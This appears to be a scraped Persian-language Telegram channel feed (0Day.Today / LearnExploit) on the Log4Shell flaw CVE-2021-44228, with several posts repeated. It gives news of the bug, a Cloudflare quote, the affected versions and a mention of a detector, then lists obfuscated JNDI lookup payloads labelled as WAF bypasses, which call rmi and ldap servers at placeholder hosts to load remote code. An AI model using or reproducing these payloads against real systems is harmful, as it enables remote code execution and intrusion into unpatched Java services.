CVE-2021-44228
* کشف آسیب پذیری بسیار جدی در کتابخانه Log4J *
کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد .
شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور فعال مورد فعال مورد سوء استفاده قرار میگیرد.
این آسیب پذیری این اجازه رو به هکر میده که از راه دور اقدام به کد زدن بکنه ( RCE )
جان گراهام کامینگ مدیر ارشد CloudFlare در این رابطه میگوید :
بهدلیل استفادهی گسترده از جاوا و log4j، این آسیبپذیری بسیار جدی و خطرناک است. حجم عظیمی از نرمافزار جاوا به اینترنت و سیستمهای بکاند متصل است. وقتی به ۱۰ سال گذشته نگاه میکنم، تنها دو آسیبپذیری مشابه دیگر به ذهنم میرسد: یکی Heartbleed که به شما امکان میدهد به اطلاعات سرورهایی دسترسی پیدا کنید که باید امن باشد و دیگری Shellshock که به شما امکان اجرای کد روی سیستمی از راه دور را میداد.
نسخه های دارای آسیب پذیری » 2.0 تا 2.14.1
نسخه فیکس شده » 2.15.0
Exploit
Another Exploit On Github
#RCE #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
* کشف آسیب پذیری بسیار جدی در کتابخانه Log4J *
کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد .
شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور فعال مورد فعال مورد سوء استفاده قرار میگیرد.
این آسیب پذیری این اجازه رو به هکر میده که از راه دور اقدام به کد زدن بکنه ( RCE )
جان گراهام کامینگ مدیر ارشد CloudFlare در این رابطه میگوید :
بهدلیل استفادهی گسترده از جاوا و log4j، این آسیبپذیری بسیار جدی و خطرناک است. حجم عظیمی از نرمافزار جاوا به اینترنت و سیستمهای بکاند متصل است. وقتی به ۱۰ سال گذشته نگاه میکنم، تنها دو آسیبپذیری مشابه دیگر به ذهنم میرسد: یکی Heartbleed که به شما امکان میدهد به اطلاعات سرورهایی دسترسی پیدا کنید که باید امن باشد و دیگری Shellshock که به شما امکان اجرای کد روی سیستمی از راه دور را میداد.
نسخه های دارای آسیب پذیری » 2.0 تا 2.14.1
نسخه فیکس شده » 2.15.0
Exploit
Another Exploit On Github
#RCE #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2021-44228 * کشف آسیب پذیری بسیار جدی در کتابخانه Log4J * کشف آسیب پذیری بسیار خطرناک به نام LogShell که در کتابخانه Log4J وجود دارد . شرکت نرم افزاری Apache پچ امنیتی مربوط این آسیب پذیری که از نوع Zeroday بود رو منتشر کرد که این کتابخانه به طور…
Log4Shell Detector v0.1
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه
Github #Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
Log4Shell Detector v0.1 زیاد تست نشده چون ورژن اول هست ممکنه یک سری مشکلات داشته باشه ولی کار میکنه Github #Log4J #Java —————— 0Day.Today @LearnExploit @Tech_Army
Apache Log4j 2.14.1 RCE (CVE-2021-44228)
1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass WAF
:
1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
3- ${jndi:rmi://adsasd.asdasd.asdasd}
4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
Bypass RC1
:
${jndi:ldap://127.0.0.1:1389/ badClassName}
Github
#Log4J #Java
——————
0Day.Today
@LearnExploit
@Tech_Army